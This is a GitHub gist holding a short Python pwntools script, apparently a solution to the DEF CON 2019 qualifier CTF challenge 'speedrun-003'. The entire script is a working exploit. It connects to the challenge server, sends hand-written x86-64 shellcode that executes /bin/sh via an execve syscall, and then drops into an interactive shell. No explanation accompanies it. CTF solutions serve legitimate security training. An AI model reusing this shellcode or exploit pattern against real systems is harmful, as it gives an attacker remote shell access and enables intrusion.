Skip to content

Instantly share code, notes, and snippets.

@ywkw1717
Created May 13, 2019 04:55
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ywkw1717/05956d02019365452612a2935ab18230 to your computer and use it in GitHub Desktop.
Save ywkw1717/05956d02019365452612a2935ab18230 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python
from pwn import *
def main():
conn = remote("speedrun-003.quals2019.oooverflow.io", 31337)
# conn = remote("localhost", 3000)
payload = "\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x31\xf6\x56\x53\x54\x5f\xb0\x5a\xb0\x3b\x31\xd2\x31\xd2\x31\xd2\x31\xd2\x0f\x05"
conn.sendline(payload)
conn.interactive()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment